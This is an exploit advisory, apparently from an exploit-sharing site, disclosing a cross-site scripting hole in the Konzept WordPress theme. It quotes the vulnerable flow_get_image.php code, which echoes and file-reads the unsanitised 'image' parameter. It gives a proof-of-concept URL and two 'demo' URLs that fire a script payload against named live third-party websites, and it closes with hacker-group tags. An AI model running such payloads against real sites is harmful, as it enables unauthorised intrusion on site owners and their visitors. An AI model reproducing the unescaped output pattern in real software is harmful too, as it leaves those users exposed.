facebook facebook twitter rss

Theme konzept Cross Site Scripting Vulnerability

Author: Pro_Mast3r , Published: 05-11-2014
#[~]  Type Exploit : Cross Site Scripting Vulnerability
#[~] Vendor : Theme konzept
#[~] Site Vendor : http://devatic.com/
#[~] Author : ProMast3r
#[~] Mail : Pro.Mast3r@hotmail.com
--------------------------------------------------------
#[~] file Vulnerability : Flow_get_image.php
#[~] source File : line 10 - 24
$value = $_GET['image'];
$mimes = get_allowed_mime_types();
$file_ext = explode('.',$value);
foreach($mimes as $type => $mime){
if(strpos($type, end($file_ext)) !== false){
if(fileExists($value)){
$contents = file_get_contents($value);
header('Content-type: '.$mime);
echo $contents;
break;
}
}
}
}else{
echo $_GET['image'];
}
--------------------------------------------------------
#[~]Poc : http://127.0.0.1/wordpress/wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=XSS
#[~] Demo : http://isthis.gd//wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=%3Cscript%3Ealert%281%29%3C/script%3E
http://www.clickboompow.com///wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=%3Cscript%3Ealert%281%29%3C/script%3E
---------------------------------------------------------
#exploit4arab
#IRAQCyberArmy

Like us on Facebook :